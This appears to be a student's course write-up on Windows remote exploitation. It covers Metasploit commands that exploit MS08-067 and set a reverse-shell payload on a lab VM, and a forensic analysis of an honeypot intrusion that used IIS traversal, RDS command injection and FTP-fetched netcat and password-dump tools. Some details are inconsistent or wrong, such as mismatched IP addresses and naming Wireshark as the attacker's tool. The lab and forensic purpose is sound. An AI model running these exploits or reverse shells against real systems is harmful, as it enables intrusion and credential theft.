ybh724

导航

20251906 2025-2026-2 《网络攻防实践》第六周作业

1.实践内容

1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息
MS08-067是微软发布的高危远程代码执行漏洞,对应CVE-2008-4250,存在于Windows系统的Server服务中,该服务默认开启并监听445端口,漏洞本质是服务在处理特定RPC请求时出现栈缓冲区溢出,攻击者无需任何身份验证,只需向目标主机445端口构造并发送恶意数据包,就能直接触发漏洞并获得SYSTEM系统最高权限,可完全控制目标主机执行任意指令、上传木马或窃取数据,主要影响Windows 2000、Windows XP、Windows Server 2003等老旧系统,利用难度低、危害极大,也是早期内网渗透和蠕虫传播常用的高危漏洞。
永恒之蓝(EternalBlue,漏洞编号 MS17-010 / CVE-2017-0144)是 Windows 系统 SMBv1 协议中的高危远程代码执行漏洞,由美国国家安全局(NSA)发现,2017 年 4 月被黑客组织 “影子经纪人” 泄露,同年 5 月因WannaCry 勒索病毒全球爆发而闻名。

2.实践过程

2.1 动手实践Metasploit windows attacker

攻击机kali的ip为192.168.200.128
image
靶机Win2k的ip为192.168.200.131
image
在kali上输入msfconsole进入启动msfconsole
image
输入search ms08_067查看漏洞ms08_067
image
image
输入use windows/smb/ms08_067_netapi进入漏洞所在文件
image
输入show options查看攻击此漏洞需要的设置
image
使用命令show payloads显示漏洞载荷
image
选择其中的第三个进行攻击:
输入命令set payload generic/shell_reverse_tcp设置载荷
输入命令set RHOST 192.168.20.131设置靶机地址
输入命令set LHOST 192.168.20.128设置攻击机地址
image
输入exploit进行攻击,出现会话连接,攻击成功
image
使用wireshark监听攻击过程,在过滤规则中输入tcp.port == 4444
image
查看追踪流
image

2.2 取证分析实践:解码一次成功的NT系统破解攻击

在学习通下载demo_NT_attack_data.zip,解压后把.log后缀改成.pcap,使用wireshark打开
image
我们以tcp流作为分析证据对整个攻击过程进行分析:
在流2中,攻击者首先正常访问网站,做前期打点,发现网站引擎为IIS
image
之后针对IIS,攻击者在流7中,攻击者使用IIS的路径穿越漏洞成功读取boot.ini文件,证明系统存在任意文件读取漏洞
image
流11攻击者利用msadcs.dll/AdvancedDataFactory.Query通过 SQL注入进行了命令执行
image
流97攻击者将cmd.exe文件复制到当前目录并重命名
image
流98开始,攻击者逐行写入生成一个ftpcom的脚本,用来文件传输
image
在流106发现ftp流量,证明脚本写入启动成功
image
流111,可以看到命令行被弹出来了,攻击完成
image

  • 问题1:攻击者使用了什么破解工具进行攻击
    攻击者使用了wireshark
    image
  • 问题2:攻击者如何使用这个破解工具进入并控制了系统
    攻击者使用了多个漏洞链来控制系统,首先探测确认是IIS站点,之后用Unicode穿越读取boot.ini,再向/msadc/msadcs.dll/AdvancedDataFactory.Query发送带shell("cmd /c ...")的请求,通过FTP下载nc.exe、pdump.exe、samdump.dll,最终拿到交互shell。
  • 问题3:攻击者获得系统访问权限后做了什么
    流111进行了留言
    image
    流111删掉了用到的工具抹除痕迹
    image
    流129攻击者尝试提权
    image
    流158攻击者拿到了口令并尝试回传
    image
  • 问题4:我们如何防止这样的攻击
    这次入侵的是利用IIS的目录穿越漏洞和/msadc/msadcs.dll的命令执行漏洞,需要及时修补漏洞,安装防病毒软件,设置好正确的防火墙规则。
  • 问题5:你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
    发现了,在rft文件中写入了echo best tillnowrfp.txt honeypot i've seen till now
    image
    image

2.3 windows系统远程渗透攻击和分析

攻击机kali的ip为192.168.200.128
靶机win2k的ip为192.168.200.131
在kali命令行中,输入msfconsole进入MetaSploite FramWork
使用use exploit/windows/smb/ms06_040_netapi进入漏洞工作目录
输入命令set RHOST 192.168.200.131设置靶机地址
输入命令set LHOST 192.168.200.128设置攻击机地址
输入命令show targets来展示所有的target种类,我们这里符合target 0
image

3.学习中遇到的问题及解决

  • 问题1:在使用虚拟机攻击时,无法攻击到虚拟机
  • 问题1解决方案:使用ping测试发现无法ping通,查看子网掩码发现两台机器不在同一子网下,修改靶机的ip地址之后就成功了

4.实践总结

本次Windows远程漏洞渗透实验中,我通过Metasploit实战渗透、NT系统攻击流量取证分析以及红蓝团队攻防对抗,完整梳理并掌握了 Windows远程漏洞攻击与防御的全流程。在实操环节,我熟练运用 MS08-067、MS06-040 等经典高危漏洞完成远程代码执行,借助Wireshark抓取攻击流量、追踪TCP数据流,清晰还原了漏洞利用、工具上传、权限获取与痕迹清理等关键攻击步骤。
此次实验不仅让我熟练掌握了渗透工具使用、网络流量分析与入侵取证的实操技能,还在红蓝对抗中直观感受到网络攻防的博弈逻辑。同时,我也深刻认识到老旧系统漏洞、高危端口随意开放所引发的巨大安全风险,充分理解了及时更新系统补丁、精细化管控网络端口、完整留存日志与流量数据对安全防护的重要意义。
在实践能力提升之外,我更树立了合法合规开展网络安全实验的准则,始终以防御加固、防范安全风险为核心目标,建立起攻防结合、以防为主的网络安全防护理念。

posted on 2026-04-22 17:10  闫炳宏  阅读(23)  评论(0)    收藏  举报